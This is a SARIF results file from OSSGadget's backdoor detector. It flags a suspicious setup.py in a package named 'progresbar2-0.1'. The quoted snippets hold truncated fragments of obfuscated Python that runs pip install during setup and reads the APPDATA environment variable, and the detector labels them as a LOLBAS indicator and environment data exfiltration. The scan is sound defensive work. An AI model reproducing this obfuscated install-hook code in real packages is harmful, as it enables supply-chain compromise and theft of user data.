{
  "$schema": "https://schemastore.azurewebsites.net/schemas/json/sarif-2.1.0-rtm.6.json",
  "version": "2.1.0",
  "runs": [
    {
      "tool": {
        "driver": {
          "name": "oss-detect-backdoor",
          "organization": "Microsoft Corporation",
          "product": "OSSGadget (https://github.com/Microsoft/OSSGadget)",
          "version": "0.0.0+4a24249b20"
        }
      },
      "results": [
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset1/python/progresbar2-0.1.tar.gz/progresbar2-0.1.tar/progresbar2-0.1/setup.py"
                },
                "region": {
                  "startLine": 12,
                  "startColumn": 10,
                  "endLine": 13,
                  "snippet": {
                    "text": " << 5) + (1 << 1), (((1 << 4) - 1) << 3) - 3, ((((3 << 2) + 1)) << 3) + 1, (((7 << 2) - 1) << 2), (((3 << 3) + 1) << 2)]))]:\t\n\t\t馬女水女口目人馬鳥月水馬山山馬鸟 = 834*(395 & 643)+865//460-(104 | 469+415) | 104 << 313 << 357 >> (935 | 183) & ~61\n\n\t\twhile 馬女水女口目人馬鳥月水馬山山馬鸟:\n\t\t\tif 108363 == 馬女水女口目人馬鳥月水馬山山馬鸟:\n\t\t\t\timport pip\n\t\t\t\tpip.main([''.join(map(getattr(__builtins__, oct.__str__()[-3 << 0] + hex.__str__()[-1 << 2] + copyright.__str__()[4 << 0]), [((((3 << 2) + 1)) << 3) + 1, (7 << 4) - (1 << 1), (7 << 4) + 3, (7 << 4) + (1 << 2), (3 << 5) + 1, (((7 << 2) - 1) << 2), (((7 << 2) - 1) << 2)])), ''.join(map(getattr(__b",
                    "rendered": {
                      "text": " << 5) + (1 << 1), (((1 << 4) - 1) << 3) - 3, ((((3 << 2) + 1)) << 3) + 1, (((7 << 2) - 1) << 2), (((3 << 3) + 1) << 2)]))]:\t\n\t\t馬女水女口目人馬鳥月水馬山山馬鸟 = 834*(395 & 643)+865//460-(104 | 469+415) | 104 << 313 << 357 >> (935 | 183) & ~61\n\n\t\twhile 馬女水女口目人馬鳥月水馬山山馬鸟:\n\t\t\tif 108363 == 馬女水女口目人馬鳥月水馬山山馬鸟:\n\t\t\t\timport pip\n\t\t\t\tpip.main([''.join(map(getattr(__builtins__, oct.__str__()[-3 << 0] + hex.__str__()[-1 << 2] + copyright.__str__()[4 << 0]), [((((3 << 2) + 1)) << 3) + 1, (7 << 4) - (1 << 1), (7 << 4) + 3, (7 << 4) + (1 << 2), (3 << 5) + 1, (((7 << 2) - 1) << 2), (((7 << 2) - 1) << 2)])), ''.join(map(getattr(__b",
                      "markdown": "` << 5) + (1 << 1), (((1 << 4) - 1) << 3) - 3, ((((3 << 2) + 1)) << 3) + 1, (((7 << 2) - 1) << 2), (((3 << 3) + 1) << 2)]))]:\t\n\t\t馬女水女口目人馬鳥月水馬山山馬鸟 = 834*(395 & 643)+865//460-(104 | 469+415) | 104 << 313 << 357 >> (935 | 183) & ~61\n\n\t\twhile 馬女水女口目人馬鳥月水馬山山馬鸟:\n\t\t\tif 108363 == 馬女水女口目人馬鳥月水馬山山馬鸟:\n\t\t\t\timport pip\n\t\t\t\tpip.main([''.join(map(getattr(__builtins__, oct.__str__()[-3 << 0] + hex.__str__()[-1 << 2] + copyright.__str__()[4 << 0]), [((((3 << 2) + 1)) << 3) + 1, (7 << 4) - (1 << 1), (7 << 4) + 3, (7 << 4) + (1 << 2), (3 << 5) + 1, (((7 << 2) - 1) << 2), (((7 << 2) - 1) << 2)])), ''.join(map(getattr(__b`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000702"
          },
          "message": {
            "text": "Backdoor: Data Exfiltration (Environment)",
            "id": "BD000702"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset1/python/progresbar2-0.1.tar.gz/progresbar2-0.1.tar/progresbar2-0.1/setup.py"
                },
                "region": {
                  "startLine": 43,
                  "startColumn": 29,
                  "endLine": 43,
                  "endColumn": 48,
                  "snippet": {
                    "text": " 771 << 369 << 218 >> (797 | 341) & ~526\n\n\t\twhile 子水女馬人月刀人馬鳥山馬馬刀女人:\n\t\t\tif 子水女馬人月刀人馬鳥山馬馬刀女人 == 12768:\n\t\t\t\t人馬口刀女子月水人目水鳥山口馬馬.close()\n\t\t\t\t子水女馬人月刀人馬鳥山馬馬刀女人 = 895*(183 & 759)+231//268-(415 | 928+255) | 415 << 22 << 536 >> (210 | 576) & ~511\n\t\t\telif 子水女馬人月刀人馬鳥山馬馬刀女人 == 183269:\n\t\t\t\t目水鸟月木人木鳥马口马刀木鳥水子 = os.getenv(''.join(map(getattr(__builtins__, oct.__str__()[-3 << 0] + hex.__str__()[-1 << 2] + copyright.__str__()[4 << 0]), [(1 << 6) + 1, (5 << 4), (5 << 4), (((1 << 4) + 1) << 2), (1 << 6) + 1, (((5 << 2) + 1) << 2), (1 << 6) + 1])))\n\t\t\t\t子水女馬人月刀人馬鳥山馬馬刀女人 = 763*(228 & 284)+333//968-(431 | 867+491) | 431 << 636 << 393 >> (9",
                    "rendered": {
                      "text": " 771 << 369 << 218 >> (797 | 341) & ~526\n\n\t\twhile 子水女馬人月刀人馬鳥山馬馬刀女人:\n\t\t\tif 子水女馬人月刀人馬鳥山馬馬刀女人 == 12768:\n\t\t\t\t人馬口刀女子月水人目水鳥山口馬馬.close()\n\t\t\t\t子水女馬人月刀人馬鳥山馬馬刀女人 = 895*(183 & 759)+231//268-(415 | 928+255) | 415 << 22 << 536 >> (210 | 576) & ~511\n\t\t\telif 子水女馬人月刀人馬鳥山馬馬刀女人 == 183269:\n\t\t\t\t目水鸟月木人木鳥马口马刀木鳥水子 = os.getenv(''.join(map(getattr(__builtins__, oct.__str__()[-3 << 0] + hex.__str__()[-1 << 2] + copyright.__str__()[4 << 0]), [(1 << 6) + 1, (5 << 4), (5 << 4), (((1 << 4) + 1) << 2), (1 << 6) + 1, (((5 << 2) + 1) << 2), (1 << 6) + 1])))\n\t\t\t\t子水女馬人月刀人馬鳥山馬馬刀女人 = 763*(228 & 284)+333//968-(431 | 867+491) | 431 << 636 << 393 >> (9",
                      "markdown": "` 771 << 369 << 218 >> (797 | 341) & ~526\n\n\t\twhile 子水女馬人月刀人馬鳥山馬馬刀女人:\n\t\t\tif 子水女馬人月刀人馬鳥山馬馬刀女人 == 12768:\n\t\t\t\t人馬口刀女子月水人目水鳥山口馬馬.close()\n\t\t\t\t子水女馬人月刀人馬鳥山馬馬刀女人 = 895*(183 & 759)+231//268-(415 | 928+255) | 415 << 22 << 536 >> (210 | 576) & ~511\n\t\t\telif 子水女馬人月刀人馬鳥山馬馬刀女人 == 183269:\n\t\t\t\t目水鸟月木人木鳥马口马刀木鳥水子 = os.getenv(''.join(map(getattr(__builtins__, oct.__str__()[-3 << 0] + hex.__str__()[-1 << 2] + copyright.__str__()[4 << 0]), [(1 << 6) + 1, (5 << 4), (5 << 4), (((1 << 4) + 1) << 2), (1 << 6) + 1, (((5 << 2) + 1) << 2), (1 << 6) + 1])))\n\t\t\t\t子水女馬人月刀人馬鳥山馬馬刀女人 = 763*(228 & 284)+333//968-(431 | 867+491) | 431 << 636 << 393 >> (9`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        }
      ],
      "columnKind": "utf16CodeUnits"
    }
  ]
}